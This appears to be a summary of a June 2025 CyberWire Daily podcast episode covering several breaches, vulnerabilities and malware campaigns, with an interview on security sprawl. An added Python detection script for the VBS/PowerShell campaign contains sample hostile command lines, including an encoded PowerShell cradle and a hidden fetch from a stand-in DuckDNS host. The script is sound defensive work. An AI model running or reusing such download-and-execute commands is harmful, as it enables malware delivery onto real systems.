CyberWire Daily – Episode: "Can’t DOGE the Inquiry"
Release Date: June 17, 2025
Host: Dave Bittner, N2K Networks
Overview
In this episode of CyberWire Daily, host Dave Bittner delves into a range of pressing cybersecurity issues, from high-profile congressional inquiries and sophisticated malware campaigns to significant vulnerabilities in major software platforms. The episode also features an in-depth interview with Brian Downey, VP of Product Management at Barracuda, discussing the challenges of security sprawl and effective adversary naming conventions.
Key News Stories
1. House Oversight Committee Requests Documents from Microsoft
Timestamp: [02:02]
Representative Stephen F. Lynch, Democrat from Massachusetts and acting ranking member of the Committee on Oversight and Government Reform, has formally requested documents from Microsoft CEO Satya Nadella. This inquiry centers around allegations that employees from Elon Musk's Department of Government Efficiency, known as "Doge," attempted to exfiltrate sensitive data from the National Labor Relations Board (NLRB).
Key Points:
- Alleged Actions: Doge staff purportedly used high-level access to remove data, including information on union activities, and obscured their actions by deleting logs and installing backdoors.
- Whistleblower Reports: NPR and internal whistleblowers have brought these activities to light.
- Code Upload: A Doge engineer allegedly uploaded code named "NX Genbedoor Extract" to GitHub, a Microsoft-owned platform.
- Congressional Investigations: Initiated by Democrats in April and May 2025, focusing on Musk and Doge's potential interference and data breaches at the NLRB.
Notable Quote:
"Lynch raised concerns over potential misconduct, privacy violations and conflicts of interest given Musk's history with the NLRB." [02:02]
2. Predatory Sparrow Claims Cyberattack on Iranian Bank
Timestamp: [02:02]
A cyber group named Predatory Sparrow, believed to be affiliated with Israeli intelligence, has claimed responsibility for a cyberattack targeting an Iranian bank. The attack disrupted banking services, affecting gas stations, delaying salaries, and forcing some branches to close.
Key Points:
- Motivation: Retaliation against the bank's alleged funding of Iran's military and nuclear programs.
- Historical Context: Predatory Sparrow has previously targeted Iran's steel and fuel sectors.
- Regional Tensions: The attack mirrors ongoing tensions, including Israeli strikes on Iranian facilities and retaliations by pro-Iranian hacktivists.
- Future Threats: Hacktivists have cautioned that regional allies of Iran may also become targets.
Notable Quote:
"The attack disrupted banking services and reportedly affected gas stations, delayed salaries and closed some branches." [02:02]
3. Microsoft Commits to European Data Residency
Timestamp: [02:02]
Microsoft has announced that data from its European cloud customers will remain within Europe, adhering to EU laws and managed by local staff. This strategy addresses increasing concerns over foreign access to sensitive data.
Key Points:
- Data Sovereignty: Ensures compliance with European regulations by keeping data localized.
- Operational Transparency: Remote access by Microsoft engineers will be approved and overseen by European personnel.
- Expansion Plans: Microsoft is enhancing its cloud and AI operations in Europe, with plans to launch a sovereign private cloud by year-end.
Notable Quote:
"Microsoft confirmed that any remote access by its engineers will be approved and monitored by European personnel." [02:02]
4. Complex Malware Campaign Uncovered by Census Researchers
Timestamp: [02:02]
A sophisticated malware campaign utilizing heavily obfuscated Visual Basic script files has been identified, deploying a variety of Remote Access Trojans (RATs) such as Remcos, AsyncRAT, DCRat, and LimeRAT.
Key Points:
- Attack Stages: Begins with bloated VBS droppers decoding base64 payloads and launching PowerShell scripts to fetch additional malware from platforms like archive.org.
- Evasion Techniques: Uses resilient infrastructure via DuckDNS.org and payloads concealed within JPEG images to avoid detection.
- Defense Recommendations: Disabling macros, filtering emails, and monitoring PowerShell usage are advised to mitigate risks.
Notable Quote:
"The campaign's advanced obfuscation and use of legitimate hosting services make detection and response especially challenging." [02:02]
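The defense recommendation above, monitoring PowerShell usage, as an added example that is not part of the episode or of any vendor's tooling: a small Python triage script that scores process-creation command lines (Sysmon Event ID 1 or Security 4688 style) for the traits the story describes, a script host launching a VBS file from a user directory, a PowerShell download cradle, an encoded command that hides the real payload, and a request to one of the hosting services named in the campaign. Encoded commands are decoded (UTF-16LE base64, which is what PowerShell's -EncodedCommand expects) so the indicators are matched against the hidden payload as well as the visible command line. The sample command lines, host names, file names and weights are constructed for this example.

```python
import base64
import re

# Constructed sample command lines, built for this example; they are not
# telemetry from the campaign. The encoded one hides a download cradle.
_STAGE2 = ('IEX (New-Object Net.WebClient).DownloadString('
           '"https://archive.org/download/example-item/stage2.txt")')
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16le")).decode("ascii")

SAMPLE_COMMAND_LINES = [
    f"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand {_ENCODED}",
    r"wscript.exe C:\Users\alice\AppData\Local\Temp\invoice_2025.vbs",
    'powershell.exe -w hidden -c "Invoke-WebRequest '
    'http://updates-example.duckdns.org/photo.jpg -OutFile $env:TEMP\\photo.jpg"',
    'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU -Descending"',
    r"C:\Windows\System32\notepad.exe C:\Users\alice\Documents\report.txt",
]

# Hosting services named in the campaign write-up (the host names in the
# samples above are constructed, not real campaign infrastructure).
SUSPECT_DOMAINS = ("duckdns.org", "archive.org")

# Weights are an assumption for this example; tune them to your environment.
WEIGHTS = {
    "encoded_command": 2,
    "hidden_window": 1,
    "execution_policy_bypass": 1,
    "download_cradle": 2,
    "suspect_host": 3,
    "script_host_from_user_dir": 3,
}

_ENC_RE = re.compile(r"(?:^|\s)-(?:enc(?:odedcommand)?|e|ec)\s+([A-Za-z0-9+/=]{16,})", re.I)
_CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|\bIEX\b|Invoke-Expression",
    re.I)
_HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
_BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|p)?\s+bypass", re.I)
_SCRIPT_HOST_RE = re.compile(
    r"\b[wc]script\.exe\b.*\\(?:Temp|AppData|Downloads)\\.*\.(?:vbs|vbe|js|wsf)\b", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload, or None if absent/invalid."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze(cmdline):
    """Score one command line; indicators are checked on the decoded payload too."""
    indicators = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        indicators.append("encoded_command")
    text = cmdline if decoded is None else cmdline + " " + decoded
    if _HIDDEN_RE.search(cmdline):
        indicators.append("hidden_window")
    if _BYPASS_RE.search(cmdline):
        indicators.append("execution_policy_bypass")
    if _CRADLE_RE.search(text):
        indicators.append("download_cradle")
    if any(d in text.lower() for d in SUSPECT_DOMAINS):
        indicators.append("suspect_host")
    if _SCRIPT_HOST_RE.search(cmdline):
        indicators.append("script_host_from_user_dir")
    score = sum(WEIGHTS[i] for i in indicators)
    return {"command_line": cmdline, "decoded": decoded,
            "indicators": indicators, "score": score}


def triage(cmdlines, threshold=3):
    """Return the command lines at or above the threshold, highest score first."""
    flagged = [r for r in (analyze(c) for c in cmdlines) if r["score"] >= threshold]
    return sorted(flagged, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for hit in triage(SAMPLE_COMMAND_LINES):
        print(hit["score"], hit["indicators"])
        print("   ", hit["command_line"][:100])
        if hit["decoded"]:
            print("    decoded:", hit["decoded"])
```

Run as-is it flags three of the five constructed samples (the encoded cradle, the hidden-window fetch from a DuckDNS host, and the script host launching a .vbs from Temp) and leaves the benign Get-Process one-liner and Notepad alone. In production the same scoring would sit on top of PowerShell Script Block Logging and process-creation events rather than on a hard-coded list, and the suspect-host list would be fed from threat intel rather than two literals.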
5. Sitecore CMS Suffers Critical Vulnerabilities
Timestamp: [02:02]
watchTowr has identified seven serious vulnerabilities in Sitecore, a widely used Content Management System (CMS) employed by major companies like HSBC, United Airlines, and L'Oréal. Three of these flaws allow unauthenticated remote code execution (RCE).
Key Points:
- Vulnerability Details: Includes a hardcoded default password combined with two post-auth RCE bugs, forming a complete pre-auth RCE chain.
- Exposure: Over 22,000 instances of Sitecore were found exposed, with the actual number likely higher.
- Patch Status: Vulnerabilities were patched in May after November notification, but no CVEs have been assigned yet.
- Recommendations: Immediate patching and credential rotation are strongly urged.
Notable Quote:
"watchTowr urges immediate patching and credential rotation, warning of the high risk to enterprise environments." [02:02]
6. North Korea Targets Academic Institutions with Malware
Timestamp: [02:02]
A new malware campaign attributed to the North Korean group Kimsuky is focusing on academic institutions by distributing password-protected research documents embedded with malicious OLE objects.
Key Points:
- Delivery Method: Phishing emails masquerade as review requests from professors, containing Hangul Word Processor (HWP) files.
- Malware Behavior: Upon activation, the malware installs multiple files, conducts system reconnaissance, and establishes remote access via AnyDesk.
- Impact: Exploits trust within academic collaborations, increasing the risk to interconnected government and private networks.
- Security Evolution: Marks a shift in social engineering tactics, combining technical precision with realistic academic lures.
Notable Quote:
"This campaign marks an evolution in social engineering, blending technical precision with realistic academic bait, and urges institutions to remain vigilant." [02:02]
7. ASUS Patches High-Severity Vulnerability in Armoury Crate Software
Timestamp: [02:02]
ASUS has addressed a high-severity vulnerability in its Armoury Crate software, which could allow attackers to gain full system access through an authorization bypass.
Key Points:
- Vulnerability Details: Caused by a Time of Check to Time of Use (TOCTOU) issue, enabling attackers to create a hard link and bypass driver restrictions.
- Affected Versions: Multiple software versions are impacted.
- Discovery and Patch: Identified by Cisco Talos and patched in May; users are advised to update immediately.
Notable Quote:
"Attackers can exploit it by creating a hard link to bypass restrictions on a driver used by Armoury Crate." [02:02]
8. CISA’s New Leader Faces Confirmation Delays
Timestamp: [02:02]
Sean Plankey, President Trump's nominee to lead the Cybersecurity and Infrastructure Security Agency (CISA), remains in confirmation limbo due to procedural delays and an incomplete FBI clearance.
Key Points:
- Nomination Stalemate: Despite bipartisan support, Senator Ron Wyden has placed a hold, demanding the release of a 2022 report on telecom vulnerabilities linked to the Salt Typhoon hack.
- CISA’s Challenges: The delay impedes a major overhaul, including proposed budget cuts and staff reductions.
- Leadership Vacuum: With former acting director Bridget Bean having departed, concerns linger over CISA's future under incoming Trump appointees.
Notable Quote:
"The delay hampers a major overhaul at CISA, including proposed budget cuts and staff reductions." [02:02]
Interview: Brian Downey on Security Sprawl and Risk
Timestamp: [12:53 – 23:42]
Guest: Brian Downey, VP of Product Management at Barracuda
Topic: How security sprawl increases risk and the necessity of rethinking adversary naming conventions.
Security Sprawl and Operational Inefficiencies
Brian Downey discusses the prevalent issue of security sprawl, where organizations manage an excessive number of security tools, leading to increased operational inefficiencies and heightened security risks.
Key Insights:
- Prevalence: "65% of people that responded said our challenge has now pivoted... they're juggling too many security tools." [13:26]
- Impact on Costs and Efficiency: "About 80% saying that this resulted in more time and cost they were spending." [13:26]
- Security Risks: "77% said the number of tools was hindering their ability to detect and mitigate threats." [13:26]
Causes of Over-Provisioning
Downey attributes security sprawl to the expanding attack surface and the necessity for diverse tools to address varied security needs. However, the vendor landscape has not adequately supported the management of these multiple tools, leading to configuration issues and increased vulnerability to breaches.
Notable Quote:
"A third of issues that are discovered and breaches that occur occur from a poorly configured configuration or poorly configured tool." [15:30]
Role of AI in Mitigating Security Sprawl
Brian highlights the potential of AI to enhance the management of multiple security tools by automating the detection of misconfigurations and anomalies, thereby reducing the operational burden.
Key Points:
- Enhanced Tool Capabilities: AI can make individual tools more powerful, potentially reducing the number needed.
- Management Overhead Reduction: AI can help identify and rectify configuration issues, improving overall security posture.
Notable Quote:
"AI can help with the management overhead of those tools... how do we simplify the management?" [17:41]
Recommendations for Managing Security Tools
Downey emphasizes the importance of conducting a thorough inventory of security tools, assessing their value in reducing risk, and ensuring effective integration to create a cohesive security ecosystem.
Key Recommendations:
- Inventory Assessment: Determine what tools are necessary based on the organization's risk profile.
- Value Evaluation: Assess the additive value each tool provides to the security strategy.
- Integration Focus: Prioritize tools that can seamlessly integrate operationally and in threat data correlation.
Notable Quote:
"You need to look at that lens and say... how do all of these fit into my strategy around reducing risk?" [18:43]
Op-Ed Discussion: Rethinking Adversary Naming Conventions
Timestamp: [23:42]
Dave Bittner highlights an op-ed by Jen Easterly and Ciaran Martin, advocating for a shift from the traditional, often whimsical naming conventions for cyber adversaries (e.g., Fancy Bear) to more descriptive and neutral terms that accurately reflect the nature of these threats.
Key Points:
- Current Practice: Adversaries are frequently named after Pokémon or other mascots, which can trivialize the seriousness of cyber threats.
- Call for Change: The authors argue for a standardized, vendor-neutral naming system similar to those used in medicine and defense.
- Benefits of Standardization: It would enhance clarity, reduce confusion among defenders, and appropriately categorize adversaries without sensationalizing them.
Notable Quote:
"It's time to stop branding our cyber adversaries like Pokémon and start naming them for what they are: nation states and criminals." [23:42]
Concluding Thoughts
This episode of CyberWire Daily provides a comprehensive overview of current cybersecurity challenges, from legislative inquiries and international cyber conflicts to the intricate issues of managing security infrastructure within organizations. The insightful discussion with Brian Downey underscores the critical need for streamlined security tool management and effective integration to mitigate risks associated with security sprawl. Additionally, the call for standardized adversary naming conventions aims to foster a more serious and unified approach to cybersecurity defense.
Produced by:
- Senior Producer: Alice Carruth
- Producer: Liz Stokes
- Mixing: Trey Hester
- Music and Sound Design: Elliot Peltzman
- Executive Producer: Jennifer Eiben
- Publisher: Peter Kilpe
Connect with CyberWire Daily:
For more detailed information on today's stories, visit thecyberwire.com or participate in the annual audience survey via the link in the show notes.